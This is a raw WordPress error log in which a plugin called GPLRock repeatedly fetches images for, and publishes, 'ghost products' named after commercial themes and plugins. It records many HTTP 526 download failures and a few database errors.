https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad22ec6d.webp [05-Apr-2026 01:39:46 UTC] GPLRock: Ghost product published with image - Product ID: seadive-scuba-diving-centre-elementor-template-kit [05-Apr-2026 01:39:47 UTC] GPLRock: Image downloaded successfully for product sayahat-travel-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c08a214.webp [05-Apr-2026 01:39:47 UTC] GPLRock: Using pre-downloaded image for product sayahat-travel-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c08a214.webp [05-Apr-2026 01:39:47 UTC] GPLRock: Ghost product published with image - Product ID: sayahat-travel-agency-elementor-template-kit [05-Apr-2026 01:39:48 UTC] GPLRock: Image downloaded successfully for product saxxy-music-band-musician-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78d6cd4b.webp [05-Apr-2026 01:39:49 UTC] GPLRock: Using pre-downloaded image for product saxxy-music-band-musician-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78d6cd4b.webp [05-Apr-2026 01:39:49 UTC] GPLRock: Ghost product published with image - Product ID: saxxy-music-band-musician-elementor-template-kit [05-Apr-2026 01:39:50 UTC] GPLRock: Image downloaded successfully for product sassco-app-landing-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a49233f.webp [05-Apr-2026 01:39:50 UTC] GPLRock: Using pre-downloaded image for product sassco-app-landing-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a49233f.webp [05-Apr-2026 01:39:50 UTC] GPLRock: Ghost product published with image - Product ID: sassco-app-landing-startup-elementor-template-kit [05-Apr-2026 01:40:51 UTC] GPLRock: Image download failed for product swg-swatches-variation-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:40:53 UTC] GPLRock: Image download failed for product swg-swatches-variation-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:40:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swg-swatches-variation---woocommerce-wordpress-plugin-33701.webp for product swg-swatches-variation-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:40:55 UTC] GPLRock: Image download failed for product swg-swatches-variation-woocommerce-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:40:57 UTC] GPLRock: Image download failed for product swg-swatches-variation-woocommerce-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:40:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swg-swatches-variation---woocommerce-wordpress-plugin-33701.webp for product swg-swatches-variation-woocommerce-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:40:59 UTC] GPLRock WARNING: Image download failed for product swg-swatches-variation-woocommerce-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/swg-swatches-variation---woocommerce-wordpress-plugin-33701.webp [05-Apr-2026 01:40:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: swg-swatches-variation-woocommerce-wordpress-plugin [05-Apr-2026 01:40:59 UTC] GPLRock: Image download failed for product envision-blocks-elementor-addons-widgets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:02 UTC] GPLRock: Image download failed for product envision-blocks-elementor-addons-widgets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/envision-blocks---elementor-addons--widgets-25209.webp for product envision-blocks-elementor-addons-widgets after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:04 UTC] GPLRock: Image download failed for product envision-blocks-elementor-addons-widgets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:06 UTC] GPLRock: Image download failed for product envision-blocks-elementor-addons-widgets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/envision-blocks---elementor-addons--widgets-25209.webp for product envision-blocks-elementor-addons-widgets after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:08 UTC] GPLRock WARNING: Image download failed for product envision-blocks-elementor-addons-widgets. URL: https://meldwp.com/wp-content/uploads/envision-blocks---elementor-addons--widgets-25209.webp [05-Apr-2026 01:41:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: envision-blocks-elementor-addons-widgets [05-Apr-2026 01:41:08 UTC] GPLRock: Image download failed for product responsive-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:10 UTC] GPLRock: Image download failed for product responsive-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-for-wpbakery-page-builder-formerly-visual-composer-7044.webp for product responsive-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:13 UTC] GPLRock: Image download failed for product responsive-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:15 UTC] GPLRock: Image download failed for product responsive-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-for-wpbakery-page-builder-formerly-visual-composer-7044.webp for product responsive-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:17 UTC] GPLRock WARNING: Image download failed for product responsive-for-wpbakery-page-builder-formerly-visual-composer. URL: https://meldwp.com/wp-content/uploads/responsive-for-wpbakery-page-builder-formerly-visual-composer-7044.webp [05-Apr-2026 01:41:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-for-wpbakery-page-builder-formerly-visual-composer [05-Apr-2026 01:41:17 UTC] GPLRock: Image download failed for product online-multi-restaurants-marketplace-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:19 UTC] GPLRock: Image download failed for product online-multi-restaurants-marketplace-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/online-multi-restaurants-marketplace-for-woocommerce-16462.webp for product online-multi-restaurants-marketplace-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:21 UTC] GPLRock: Image download failed for product online-multi-restaurants-marketplace-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:23 UTC] GPLRock: Image download failed for product online-multi-restaurants-marketplace-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/online-multi-restaurants-marketplace-for-woocommerce-16462.webp for product online-multi-restaurants-marketplace-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:26 UTC] GPLRock WARNING: Image download failed for product online-multi-restaurants-marketplace-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/online-multi-restaurants-marketplace-for-woocommerce-16462.webp [05-Apr-2026 01:41:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: online-multi-restaurants-marketplace-for-woocommerce [05-Apr-2026 01:41:26 UTC] GPLRock: Image download failed for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:28 UTC] GPLRock: Image download failed for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-whatsapp-anyform-plugin---submit-any-form-as-whatsapp-message---wordpr-17306.webp for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:30 UTC] GPLRock: Image download failed for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:32 UTC] GPLRock: Image download failed for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-whatsapp-anyform-plugin---submit-any-form-as-whatsapp-message---wordpr-17306.webp for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:34 UTC] GPLRock WARNING: Image download failed for product wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-whatsapp-anyform-plugin---submit-any-form-as-whatsapp-message---wordpr-17306.webp [05-Apr-2026 01:41:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-whatsapp-anyform-plugin-submit-any-form-as-whatsapp-message-wordpress-plugin [05-Apr-2026 01:41:34 UTC] GPLRock: Image download failed for product unique-hover-effects-vc-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:36 UTC] GPLRock: Image download failed for product unique-hover-effects-vc-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unique-hover-effects---vc-addon-596.webp for product unique-hover-effects-vc-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:39 UTC] GPLRock: Image download failed for product unique-hover-effects-vc-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:41 UTC] GPLRock: Image download failed for product unique-hover-effects-vc-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unique-hover-effects---vc-addon-596.webp for product unique-hover-effects-vc-addon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:43 UTC] GPLRock WARNING: Image download failed for product unique-hover-effects-vc-addon. URL: https://meldwp.com/wp-content/uploads/unique-hover-effects---vc-addon-596.webp [05-Apr-2026 01:41:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unique-hover-effects-vc-addon [05-Apr-2026 01:41:43 UTC] GPLRock: Image download failed for product edd-variable-license-expiration-dates (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:45 UTC] GPLRock: Image download failed for product edd-variable-license-expiration-dates (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edd-variable-license-expiration-dates-22911.webp for product edd-variable-license-expiration-dates after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:48 UTC] GPLRock: Image download failed for product edd-variable-license-expiration-dates (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:50 UTC] GPLRock: Image download failed for product edd-variable-license-expiration-dates (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edd-variable-license-expiration-dates-22911.webp for product edd-variable-license-expiration-dates after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:52 UTC] GPLRock WARNING: Image download failed for product edd-variable-license-expiration-dates. URL: https://meldwp.com/wp-content/uploads/edd-variable-license-expiration-dates-22911.webp [05-Apr-2026 01:41:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edd-variable-license-expiration-dates [05-Apr-2026 01:41:52 UTC] GPLRock: Image download failed for product woocommerce-telegram-order-notification-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:54 UTC] GPLRock: Image download failed for product woocommerce-telegram-order-notification-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-telegram-order-notification---wordpress-plugin-558.webp for product woocommerce-telegram-order-notification-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:41:56 UTC] GPLRock: Image download failed for product woocommerce-telegram-order-notification-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:41:58 UTC] GPLRock: Image download failed for product woocommerce-telegram-order-notification-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-telegram-order-notification---wordpress-plugin-558.webp for product woocommerce-telegram-order-notification-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:42:00 UTC] GPLRock WARNING: Image download failed for product woocommerce-telegram-order-notification-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-telegram-order-notification---wordpress-plugin-558.webp [05-Apr-2026 01:42:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-telegram-order-notification-wordpress-plugin [05-Apr-2026 01:42:00 UTC] GPLRock: Image download failed for product social-login-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:03 UTC] GPLRock: Image download failed for product social-login-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-login---wordpress--woocommerce-plugin-29312.webp for product social-login-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:42:05 UTC] GPLRock: Image download failed for product social-login-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:07 UTC] GPLRock: Image download failed for product social-login-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-login---wordpress--woocommerce-plugin-29312.webp for product social-login-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:42:09 UTC] GPLRock WARNING: Image download failed for product social-login-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/social-login---wordpress--woocommerce-plugin-29312.webp [05-Apr-2026 01:42:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-login-wordpress-woocommerce-plugin [05-Apr-2026 01:42:09 UTC] GPLRock: Image download failed for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:11 UTC] GPLRock: Image download failed for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-redirect-to-page-or-url-on-add-to-cart---direct-checkout-or-skip-car-1082.webp for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:42:13 UTC] GPLRock: Image download failed for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:16 UTC] GPLRock: Image download failed for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:42:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-redirect-to-page-or-url-on-add-to-cart---direct-checkout-or-skip-car-1082.webp for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:42:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart. URL: https://meldwp.com/wp-content/uploads/woocommerce-redirect-to-page-or-url-on-add-to-cart---direct-checkout-or-skip-car-1082.webp [05-Apr-2026 01:42:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-redirect-to-page-or-url-on-add-to-cart-direct-checkout-or-skip-cart [05-Apr-2026 01:43:55 UTC] GPLRock: Image downloaded successfully for product woocommerce-ups-shipping-method (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e848158.jpg [05-Apr-2026 01:43:55 UTC] GPLRock: Using pre-downloaded image for product woocommerce-ups-shipping-method: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e848158.jpg [05-Apr-2026 01:43:55 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-ups-shipping-method [05-Apr-2026 01:43:56 UTC] GPLRock: Image downloaded successfully for product go-night-pro-dark-mode-night-mode-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa928714.jpg [05-Apr-2026 01:43:56 UTC] GPLRock: Using pre-downloaded image for product go-night-pro-dark-mode-night-mode-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa928714.jpg [05-Apr-2026 01:43:56 UTC] GPLRock: Ghost product published with image - Product ID: go-night-pro-dark-mode-night-mode-wordpress-plugin [05-Apr-2026 01:43:58 UTC] GPLRock: Image downloaded successfully for product woocommerce-table-rate-shipping (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5213fc32.jpg [05-Apr-2026 01:43:58 UTC] GPLRock: Using pre-downloaded image for product woocommerce-table-rate-shipping: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5213fc32.jpg [05-Apr-2026 01:43:58 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-table-rate-shipping [05-Apr-2026 01:44:00 UTC] GPLRock: Image downloaded successfully for product ultimate-addons-for-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff88d8d0.jpg [05-Apr-2026 01:44:00 UTC] GPLRock: Using pre-downloaded image for product ultimate-addons-for-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff88d8d0.jpg [05-Apr-2026 01:44:00 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-addons-for-wpbakery-page-builder [05-Apr-2026 01:44:02 UTC] GPLRock: Image downloaded successfully for product cheerup-blog-magazine-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50d8b96f.jpg [05-Apr-2026 01:44:02 UTC] GPLRock: Using pre-downloaded image for product cheerup-blog-magazine-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50d8b96f.jpg [05-Apr-2026 01:44:02 UTC] GPLRock: Ghost product published with image - Product ID: cheerup-blog-magazine-wordpress-blog-theme [05-Apr-2026 01:44:04 UTC] GPLRock: Image downloaded successfully for product woocommerce-twilio-sms-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-474d8a5f.jpg [05-Apr-2026 01:44:04 UTC] GPLRock: Using pre-downloaded image for product woocommerce-twilio-sms-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-474d8a5f.jpg [05-Apr-2026 01:44:04 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-twilio-sms-notifications [05-Apr-2026 01:44:05 UTC] GPLRock: Image downloaded successfully for product photography-photography-wordpress-for-photography (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef439e08.jpg [05-Apr-2026 01:44:05 UTC] GPLRock: Using pre-downloaded image for product photography-photography-wordpress-for-photography: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef439e08.jpg [05-Apr-2026 01:44:05 UTC] GPLRock: Ghost product published with image - Product ID: photography-photography-wordpress-for-photography [05-Apr-2026 01:44:07 UTC] GPLRock: Image downloaded successfully for product yith-the-jewelry-shop-a-luxurious-and-elegant-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad968177.jpg [05-Apr-2026 01:44:07 UTC] GPLRock: Using pre-downloaded image for product yith-the-jewelry-shop-a-luxurious-and-elegant-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad968177.jpg [05-Apr-2026 01:44:07 UTC] GPLRock: Ghost product published with image - Product ID: yith-the-jewelry-shop-a-luxurious-and-elegant-theme [05-Apr-2026 01:44:09 UTC] GPLRock: Image downloaded successfully for product arena-products-store-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a40c7ffb.jpg [05-Apr-2026 01:44:09 UTC] GPLRock: Using pre-downloaded image for product arena-products-store-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a40c7ffb.jpg [05-Apr-2026 01:44:09 UTC] GPLRock: Ghost product published with image - Product ID: arena-products-store-wordpress-plugin [05-Apr-2026 01:44:11 UTC] GPLRock: Image downloaded successfully for product stocky-a-stock-photography-marketplace-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba2abced.jpg [05-Apr-2026 01:44:11 UTC] GPLRock: Using pre-downloaded image for product stocky-a-stock-photography-marketplace-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba2abced.jpg [05-Apr-2026 01:44:11 UTC] GPLRock: Ghost product published with image - Product ID: stocky-a-stock-photography-marketplace-theme [05-Apr-2026 01:44:13 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 01:44:13 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775353453.6813309192657470703125', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 01:45:38 UTC] GPLRock: Image download failed for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:40 UTC] GPLRock: Image download failed for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailbox---webmail-based-e-mail-client-module-for-perfex-crm-31643.webp for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:45:42 UTC] GPLRock: Image download failed for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:44 UTC] GPLRock: Image download failed for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailbox---webmail-based-e-mail-client-module-for-perfex-crm-31643.webp for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:45:47 UTC] GPLRock WARNING: Image download failed for product mailbox-webmail-based-e-mail-client-module-for-perfex-crm. URL: https://meldwp.com/wp-content/uploads/mailbox---webmail-based-e-mail-client-module-for-perfex-crm-31643.webp [05-Apr-2026 01:45:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mailbox-webmail-based-e-mail-client-module-for-perfex-crm [05-Apr-2026 01:45:47 UTC] GPLRock: Image downloaded successfully for product subscribe-to-unlock-opt-in-content-locker-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e0e5b7c.webp [05-Apr-2026 01:45:47 UTC] GPLRock: Using pre-downloaded image for product subscribe-to-unlock-opt-in-content-locker-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e0e5b7c.webp [05-Apr-2026 01:45:47 UTC] GPLRock: Ghost product published with image - Product ID: subscribe-to-unlock-opt-in-content-locker-wordpress-plugin [05-Apr-2026 01:45:47 UTC] GPLRock: Image download failed for product woocommerce-activity-log (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:49 UTC] GPLRock: Image download failed for product woocommerce-activity-log (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-activity-log-14816.webp for product woocommerce-activity-log after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:45:51 UTC] GPLRock: Image download failed for product woocommerce-activity-log (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:53 UTC] GPLRock: Image download failed for product woocommerce-activity-log (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-activity-log-14816.webp for product woocommerce-activity-log after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:45:55 UTC] GPLRock WARNING: Image download failed for product woocommerce-activity-log. URL: https://meldwp.com/wp-content/uploads/woocommerce-activity-log-14816.webp [05-Apr-2026 01:45:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-activity-log [05-Apr-2026 01:45:55 UTC] GPLRock: Image download failed for product youtube-vimeo-popup-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:45:58 UTC] GPLRock: Image download failed for product youtube-vimeo-popup-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/youtube-vimeo-popup-plugin-15060.webp for product youtube-vimeo-popup-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:00 UTC] GPLRock: Image download failed for product youtube-vimeo-popup-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:02 UTC] GPLRock: Image download failed for product youtube-vimeo-popup-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/youtube-vimeo-popup-plugin-15060.webp for product youtube-vimeo-popup-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:04 UTC] GPLRock WARNING: Image download failed for product youtube-vimeo-popup-plugin. URL: https://meldwp.com/wp-content/uploads/youtube-vimeo-popup-plugin-15060.webp [05-Apr-2026 01:46:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: youtube-vimeo-popup-plugin [05-Apr-2026 01:46:04 UTC] GPLRock: Image download failed for product sky-mega-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:06 UTC] GPLRock: Image download failed for product sky-mega-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sky-mega-menu-30083.webp for product sky-mega-menu after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:46:08 UTC] GPLRock: Image download failed for product sky-mega-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:46:10 UTC] GPLRock: Image download failed for product sky-mega-menu (attempt 2/3). 